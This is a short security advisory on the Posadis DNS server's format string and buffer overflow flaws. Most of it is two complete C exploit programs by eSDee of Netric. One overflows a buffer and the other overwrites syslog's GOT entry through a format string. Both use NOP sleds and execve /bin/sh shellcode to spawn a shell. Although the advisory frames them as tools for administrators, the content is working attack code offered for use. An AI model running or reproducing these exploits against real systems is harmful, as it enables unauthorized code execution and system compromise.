tjdrldud@hanmail.net http://assa.backrush.com
Posadis Format String and Buffer Overflow Exploit Codes
Summary
Posadis DNS server is a simple DNS server designed for Win32 and Linux, which will support administration through a web interface. The log_print function is badly written allowing an attacker to cause a format string vulnerability in the product or overflow an internal buffer causing a buffer overflow vulnerability, both these allow remote code execution. The following are exploit codes that can be used by administrators to test their for the mentioned vulnerabilities.
Details
Exploit:
/* local posadis m5pre2 exploit by eSDee of Netric - (www.netric.org)
* ------------------------------------------------------------------
* The formatstring bug (discovered by kkr) is fixed in the log_print
* function in m5pre2. However, there exists an unchecked buffer in
* m5pre2 and prior, that can be exploited too.
* ------------------------------------------------------------------
*/
#include <stdio.h>
char shellcode[]=
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int
main ()
{
unsigned long ret = 0xbffff550;
char buf[4068];
int i=0;
memset(buf, 0x90, sizeof(buf));
for (0; i < sizeof(shellcode) - 1;i++) {
buf[4000+i] = shellcode[i];
}
buf[4063] = (ret & 0x000000ff);
buf[4064] = (ret & 0x0000ff00) >> 8;
buf[4065] = (ret & 0x00ff0000) >> 16;
buf[4066] = (ret & 0xff000000) >> 24;
buf[4067] = '\0';
printf("ret: 0x%x\n",ret);
execl("./posadis", "posadis", buf, NULL);
return 0;
}
/* local posadis m5pre1 exploit by eSDee of Netric - (www.netric.org)
* ------------------------------------------------------------------
*
*
* to find the retloc:
* objdump -R posa-dis | grep syslog
* 08063ddc R_386_JUMP_SLOT syslog
*
*/
#include <stdio.h>
#define RETLOC 0x08063ddc
#define RET 0xbffffdac
char shellcode[] =
"\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
"\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
"\x80\xe8\xdc\xff\xff\xff/bin/sh";
int
padding(int write_byte, int already_written)
{
int padding;
write_byte += 0x100;
already_written %= 0x100;
padding = (write_byte - already_written) % 0x100;
if (padding < 10)
padding += 0x100;
return padding;
}
int
main()
{
char format[512],
writecode[8],
egg[1024],
*ptr;
int already_written = 0xfc,
tmp,
i;
long *addr_ptr;
ptr = egg;
for (i = 0; i < 1024 - strlen(shellcode) -1; i++) *(ptr++) = 0x90;
for (i = 0; i < strlen(shellcode); i++) *(ptr++) = shellcode[i];
egg[1024 - 1] = '\0';
memcpy(egg,"EGG=",4);
putenv(egg);
strcpy(format, "jjj");
ptr = format+3;
addr_ptr = (long *) ptr;
for (i = 0; i < 4; i++) {
*(addr_ptr++) = RETLOC + i;
*(addr_ptr++) = 0xb0efb0ef;
}
*(ptr + 32) = 0;
for (i = 0; i < 18; i++)
strcat(format, "%08x.");
for (i = 0; i <= 24; i += 8) {
tmp = padding((RET >> i) & 0xff, already_written) + 10;
sprintf(writecode, "%%%du%%n", tmp);
strcat(format, writecode);
already_written += tmp;
}
printf("local posadis m5pre1 exploit by eSDee of Netric - (www.netric.org)\n");
printf("------------------------------------------------------------------\n");
printf("return address : 0x%08x\n",RET);
printf("return location: 0x%08x\n\n",RETLOC);
execl("./posadis","posadis",format,NULL);
}
Additional information
The information has been provided by eSDee.
|